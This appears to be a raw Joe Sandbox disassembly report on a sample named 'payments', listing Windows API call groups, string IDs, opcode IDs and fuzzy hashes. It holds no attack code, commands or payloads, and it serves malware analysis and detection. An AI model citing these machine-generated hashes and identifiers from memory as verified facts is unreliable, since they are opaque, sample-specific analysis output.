• GetLastError.KERNEL32(?,00CCA69F,?,?,?), ref: 00CCABE1
• GetProcessHeap.KERNEL32(00000008,?,?,00CCA69F,?,?,?), ref: 00CCABF0
• HeapAlloc.KERNEL32(00000000,?,00CCA69F,?,?,?), ref: 00CCABF7
• GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCAC0E
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• CLSIDFromProgID.OLE32 ref: 00CC9ADC
• ProgIDFromCLSID.OLE32(?,00000000), ref: 00CC9AF7
• lstrcmpiW.KERNEL32(?,00000000), ref: 00CC9B05
• CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00CC9B15
• CLSIDFromString.OLE32(?,?), ref: 00CC9B21
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7A74
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD7A82
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7A8A
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD7A94
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CCAADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAAE4
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAAF3
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAB10
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CCAA79
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CCAA83
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CCAA92
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CCAA99
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CCAAAF
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 44706859-0
                                                                                                                          • Opcode ID: e27871df5abf22fdbd10053890a54a2656fcebd7ab3dfedbe3c2f898a744d4f7
                                                                                                                          • Instruction ID: 8884ce7c4bfb2e846d8f77595ba3a276e61cf97dea29d5f479d0386046acd692
                                                                                                                          • Instruction Fuzzy Hash: 2FF03C752403187FEB115FA4EC89FA73BADFB4A758B00441DF951C6290DB609C42DA71
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CCEC94
                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CCECAB
                                                                                                                          • MessageBeep.USER32(00000000), ref: 00CCECC3
                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00CCECDF
                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00CCECF9
                                                                                                                          Similarity
                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3741023627-0
                                                                                                                          • Opcode ID: fd7f0670534ae64353be9c2c26febb11d76b6659c5c2e3b9ed7f9db702a095eb
                                                                                                                          • Instruction ID: e56f81387547da332f216cde8385e8a7e5245c3d6c23afeb39b4e43e2c1a0f24
                                                                                                                          • Instruction Fuzzy Hash: BF01A930900718ABEB205B20DE4EFD67BB9BB01B05F00455DE692A15E0DBF0AA85CBA0
                                                                                                                          APIs
                                                                                                                          • EndPath.GDI32(?), ref: 00CAB0BA
                                                                                                                          • StrokeAndFillPath.GDI32(?,?,00D0E680,00000000,?,?,?), ref: 00CAB0D6
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00CAB0E9
                                                                                                                          • DeleteObject.GDI32 ref: 00CAB0FC
                                                                                                                          • StrokePath.GDI32(?), ref: 00CAB117
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2625713937-0
                                                                                                                          • Opcode ID: e0f4519494b9dd05309ad75837730b7186236bdc0fff8283110f0fca9bd3b4f0
                                                                                                                          • Instruction ID: 0522b5d78b657096f16f7e6732351eacdb51e89985db6364ee0caa1447e708fe
                                                                                                                          • Instruction Fuzzy Hash: 42F0F678000705AFCB219F65EC087993B65B701366F088318F829C42F1CB348A96CF20
                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CDF2DA
                                                                                                                          • CoCreateInstance.OLE32(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDF2F2
                                                                                                                          • CoUninitialize.OLE32 ref: 00CDF555
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                                                          • String ID: .lnk
                                                                                                                          • API String ID: 948891078-24824748
                                                                                                                          • Opcode ID: aae8a78d40fe9bc3ae808773704b3547d63fe179b4199d1fb2bdee2b51d68daa
                                                                                                                          • Instruction ID: 1c591aba325854f3ba5d89121725853aefe6a49e3cc711bf81c241183b23071b
                                                                                                                          • Instruction Fuzzy Hash: 97A14D71104201AFD700EF64C886DAFB7ECEF99718F00491DF55697292EB70EA49DB62
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C953B1,?,?,00C961FF,?,00000000,00000001,00000000), ref: 00C9662F
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CDE85D
                                                                                                                          • CoCreateInstance.OLE32(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDE876
                                                                                                                          • CoUninitialize.OLE32 ref: 00CDE893
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                          • String ID: .lnk
                                                                                                                          • API String ID: 2126378814-24824748
                                                                                                                          • Opcode ID: cc670ec7f72803868c3fcf20ec70fb5b84dfb000633261318d89e24895d53dc4
                                                                                                                          • Instruction ID: 016821edddb469e953cd9a89ad565aedf27f9f06331bea897d039782a3ced438
                                                                                                                          • Instruction Fuzzy Hash: E0A159756043019FCB10EF24C48895EBBE5FF88324F048959F9969B3A1CB31ED45DB91
                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00CB32ED
                                                                                                                            • Part of subcall function 00CBE0D0: __87except.LIBCMT ref: 00CBE10B
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__87except__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 2905807303-2276729525
                                                                                                                          • Opcode ID: 990b35ab8b4e2a80c674340cd00b0ed1d220e0abd406d48abd1877a59fc28b90
                                                                                                                          • Instruction ID: 1265c91f18a891e16c21f99f8d93508ba543ff6771c0848c995f5107b6b55abc
                                                                                                                          • Instruction Fuzzy Hash: 0C512871A0824196CB15B718C9413FF2BD49B50B10F348D28F4E6862AADE34CF95EA57
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00D2DC50,?,0000000F,0000000C,00000016,00D2DC50,?), ref: 00CD4645
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00CD46C5
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                          • String ID: REMOVE$THIS
                                                                                                                          • API String ID: 3797816924-776492005
                                                                                                                          • Opcode ID: 4c9be64047cde16b930ab0b467fc13537f22948787ad2650bfe69dad89f76d8b
                                                                                                                          • Instruction ID: 542dce84c89b6f4f16ea80b1d01946a890d1c3c712eb35c5fb9c42c614a9918d
                                                                                                                          • Instruction Fuzzy Hash: 3741C635A002199FCF04EFA4C885AAEB7B5FF49314F14805AEB16AB3A2DB30DD45DB50
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D2DC00,00000000,?,?,?,?), ref: 00CFA6D8
                                                                                                                          • GetWindowLongW.USER32 ref: 00CFA6F5
                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CFA705
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Long
                                                                                                                          • String ID: SysTreeView32
                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                          • Opcode ID: 7be6506282be5b03eaacc774d60cd380c3324fc0d32c09c2eb310820088cee3f
                                                                                                                          • Instruction ID: 934845f85a753cdb694ea8234b02f12084314eb52276bf293b7ddff440ea9ffe
                                                                                                                          • Opcode Fuzzy Hash: 7be6506282be5b03eaacc774d60cd380c3324fc0d32c09c2eb310820088cee3f
                                                                                                                          • Instruction Fuzzy Hash: 5E31B07110020AAFDB519F38CC41BEABBA9FB49324F244715F979D32E0C730AD519B61
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CFA15E
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CFA172
                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CFA196
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window
                                                                                                                          • String ID: SysMonthCal32
                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                          • Opcode ID: 0b037293d0d880f077c55cf75182645cc837c40407e173d54c5e68a72dee83b3
                                                                                                                          • Instruction ID: 408fc660f2a6505fa02b2673c443541f8fb5aba0523f4e764a7d71fcf4c3191a
                                                                                                                          • Opcode Fuzzy Hash: 0b037293d0d880f077c55cf75182645cc837c40407e173d54c5e68a72dee83b3
                                                                                                                          • Instruction Fuzzy Hash: B321AD72500218ABDF158F94CC42FEE3B7AEF48714F114214FB59AB190D6B5A851DBA1
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CFA941
                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CFA94F
                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CFA956
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                          • String ID: msctls_updown32
                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                          • Opcode ID: b00d83bc534a7618b7b494c5f3048b8187499a9aee16a08decc5de7ac2ea07e4
                                                                                                                          • Instruction ID: f79d79d80a36af254f80b116e1d3620474441dddc0a74e0778db4915c35996c5
                                                                                                                          • Opcode Fuzzy Hash: b00d83bc534a7618b7b494c5f3048b8187499a9aee16a08decc5de7ac2ea07e4
                                                                                                                          • Instruction Fuzzy Hash: 7F21B2B9600209AFDB00DF18CC91EB777ADEB4A3A4B040059FA18973A1CB70ED118B72
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CF9A30
                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CF9A40
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CF9A65
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                          • String ID: Listbox
                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                          • Opcode ID: 39b71ee8030dd4407d2ed14bc7c45ff464afa324308ef89a508f60b3f1b69466
                                                                                                                          • Instruction ID: 3b4b1333a7b775b59c65b235dc838d0835ad07f01ea2e0f3cef5b621d867b768
                                                                                                                          • Opcode Fuzzy Hash: 39b71ee8030dd4407d2ed14bc7c45ff464afa324308ef89a508f60b3f1b69466
                                                                                                                          • Instruction Fuzzy Hash: 0C21B33261021CBFDF618F54CC85FBB3BAAEF89754F018129FA54971A0C6719D5297A0
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCB5D2
                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCB5E9
                                                                                                                          • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00CCB621
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: 2d7e98a3e8cd8580e2802fabda6b03e60def20695ed497399920063a5ef6941b
                                                                                                                          • Instruction ID: 11ffdaa9698b904a8fbc3d8e8c5177fdb5b541a87851ee60ff33bba7175370d5
                                                                                                                          • Opcode Fuzzy Hash: 2d7e98a3e8cd8580e2802fabda6b03e60def20695ed497399920063a5ef6941b
                                                                                                                          • Instruction Fuzzy Hash: 04216F72600218BFDF14DBA8C942EAEF7BDEF54340F10445AF505E3290DB71AE169AA4
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000402,00000000,00000000), ref: 00CE87F3
                                                                                                                          • SendMessageW.USER32(0000000C,00000000,?), ref: 00CE8834
                                                                                                                          • SendMessageW.USER32(0000000C,00000000,?), ref: 00CE885C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: c58acd0f935f0b390f868f29d1bfb924a0ba314b1689bf83b08df67911370b79
                                                                                                                          • Instruction ID: 7fb3789dfbe908a7de27f966d13f914d7ddfa0ac02ba31a7334b05c19ab6d532
                                                                                                                          • Opcode Fuzzy Hash: c58acd0f935f0b390f868f29d1bfb924a0ba314b1689bf83b08df67911370b79
                                                                                                                          • Instruction Fuzzy Hash: C2213879200650EFDB10EB2AD885E2AB7EAFB09710B408055F919DB6B1CB31FC51DBA4
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CFA46D
                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CFA482
                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CFA48F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                          • Opcode ID: f101277af8e1f08844dd48b7a3be626d85549d08699ef2c9837b29bb93dcdd4f
                                                                                                                          • Instruction ID: adc5220498fcabdb8bd2591db276bbc93e19571ad491447856439c478a93f451
                                                                                                                          • Opcode Fuzzy Hash: f101277af8e1f08844dd48b7a3be626d85549d08699ef2c9837b29bb93dcdd4f
                                                                                                                          • Instruction Fuzzy Hash: C511E7B120030CBEEF245F65CC45FEB7B69EF89754F014118FB59A6091D6B1E811DB25
                                                                                                                          APIs
                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00CF9699
                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CF96A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                                          • String ID: @U=u$edit
                                                                                                                          • API String ID: 2978978980-590756393
                                                                                                                          • Opcode ID: 9464410aed55b878fca5065c584c215ca8748f41a2e9fdd80d244ac56fbecbb0
                                                                                                                          • Instruction ID: 46b1912de61f5c7119b1714ee8081457bd9b08cb555b999bb524a48f03a4effd
                                                                                                                          • Opcode Fuzzy Hash: 9464410aed55b878fca5065c584c215ca8748f41a2e9fdd80d244ac56fbecbb0
                                                                                                                          • Instruction Fuzzy Hash: F2115871100208AAEF915F649C40FFB3B6AEB153A8F204314FA75D72E0C7359C51AB61
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CCB7EF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u$ComboBox$ListBox
• API String ID: 3850602802-2258501812
• Opcode ID: 717478a89e7609771fbc14426bd7074af71500bc8d6bca73bced8528b9b23c73
• Instruction ID: 330fb8f2826e2f75de852312941c1c19c70c6dc719fdd394a20fc9820bb3b742
• Opcode Fuzzy Hash: 717478a89e7609771fbc14426bd7074af71500bc8d6bca73bced8528b9b23c73
• Instruction Fuzzy Hash: 0C01D471641118AFCB04EBA4CC97EFE3369BF45350B04061DF872A72D2EB705D0897A0
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00CCB6EB
Strings
Similarity
• API ID: MessageSend
• String ID: @U=u$ComboBox$ListBox
• API String ID: 3850602802-2258501812
• Opcode ID: c1baa73207ff21a50ecb6f89e11ba4aa89017e766d9a9ceccff30c8213103e3b
• Instruction ID: 44ee6b1474d6d31dbb3df5e4ddd79707757fe9046fece5f9925f89706caedd04
• Opcode Fuzzy Hash: c1baa73207ff21a50ecb6f89e11ba4aa89017e766d9a9ceccff30c8213103e3b
• Instruction Fuzzy Hash: FA018FB1641108ABCB08EBA4C957FFE73A89F05344F10002DF412A3281EB505F18A7B5
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00CCB76C
Strings
Similarity
• API ID: MessageSend
• String ID: @U=u$ComboBox$ListBox
• API String ID: 3850602802-2258501812
• Opcode ID: 9235437b49b1d64d181a36ec3d2a8760fb7375441a3a6eca18c70ef77ba496f4
• Instruction ID: 3f822d121e0d952c366ce9c49cea669ee102bd2f1c930328f433d9f680451085
• Opcode Fuzzy Hash: 9235437b49b1d64d181a36ec3d2a8760fb7375441a3a6eca18c70ef77ba496f4
• Instruction Fuzzy Hash: 86018BB6641108BBCB01EBA4C953FFE73A89B05344F50002DF802B3292EB609F19A7B5
APIs
• GetForegroundWindow.USER32(?,00D51628,00D004C9,000000FC,?,00000000,00000000,?,?,?,00D0E47E,?,?,?,?,?), ref: 00CFD976
• GetFocus.USER32 ref: 00CFD97E
  • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
  • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
• SendMessageW.USER32(00E965A8,000000B0,000001BC,000001C0), ref: 00CFD9F0
Strings
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: @U=u
• API String ID: 3601265619-2594219639
• Opcode ID: da216baf3b43c9f2e7b1cc75d5202c518e329cfc8b5acdbe7efbe67b3be9f11e
• Instruction ID: 30150d91df3a7aa45beaa178b35ef7de253d86ae8f71ffe0360f2c5be57c8ad6
• Opcode Fuzzy Hash: da216baf3b43c9f2e7b1cc75d5202c518e329cfc8b5acdbe7efbe67b3be9f11e
• Instruction Fuzzy Hash: 730184352003109BC7108B28D884AB673ABBF89315F184369E92AC73A1DF319D46CB11
APIs
  • Part of subcall function 00C9103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91052
• SendMessageW.USER32(?,0000000C,00000000,?), ref: 00C9101C
• GetParent.USER32 ref: 00D02026
• InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?), ref: 00D0202D
Strings
Similarity
• API ID: MessageSend$InvalidateParentRectTimeout
• String ID: @U=u
• API String ID: 3648793173-2594219639
• Opcode ID: 6650017750f76e0fc459924be04f60c57eac8fd9e9f4949d65afd15b5891387a
• Instruction ID: 45b16453882faa159addc593fe48187a2d44c415ad4bc6bfbd5f52dc258f7ee3
• Opcode Fuzzy Hash: 6650017750f76e0fc459924be04f60c57eac8fd9e9f4949d65afd15b5891387a
• Instruction Fuzzy Hash: 6EF0A0301003D8FBEF201F60DC4EF953BA9AB123C0F149015F9849B5A1CBA35892AB60
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00CB2350,?), ref: 00CB22A1
• GetProcAddress.KERNEL32(00000000), ref: 00CB22A8
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 2574300362-340411864
• Opcode ID: 61d15b0c4cb7f0d6474ecc3fd16adc4d5f6f6a0252d2005b889f68274ad9a7d5
• Instruction ID: c4f2dd682a17cb067dd8bd40bb6c517a1155e59f4ac4eaca8f8e44233e679ca5
• Opcode Fuzzy Hash: 61d15b0c4cb7f0d6474ecc3fd16adc4d5f6f6a0252d2005b889f68274ad9a7d5
• Instruction Fuzzy Hash: A2E01A746D4B11BFDB105F74EC4EFD43A6AAB11756F104020B512D52A0CFB44085CF36
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CB2276), ref: 00CB2376
• GetProcAddress.KERNEL32(00000000), ref: 00CB237D
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 2574300362-2819208100
• Opcode ID: 09b1b2d9aca33cb8eaeaffe3d580953ec03a2db7ccb71dd6f6c65af717dbd518
• Instruction ID: 262e17447aedc7d8b6786057d43c122aef06d6add2cb2fdc00d0554fd3afa22c
• Opcode Fuzzy Hash: 09b1b2d9aca33cb8eaeaffe3d580953ec03a2db7ccb71dd6f6c65af717dbd518
• Instruction Fuzzy Hash: 23E0B674588710BFDB205F60FD0DF843AAAB711702F104414F90AD22B8DBB855449A36
APIs
Strings
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: 18cf4635ebe4f711f4fba40361e9f9593660c58007785102752c2f6d28cb9d37
• Instruction ID: f4af1e8ecab0c29e69ddec668491080911cc85613ac3a3b613949d0ba7143e18
• Opcode Fuzzy Hash: 18cf4635ebe4f711f4fba40361e9f9593660c58007785102752c2f6d28cb9d37
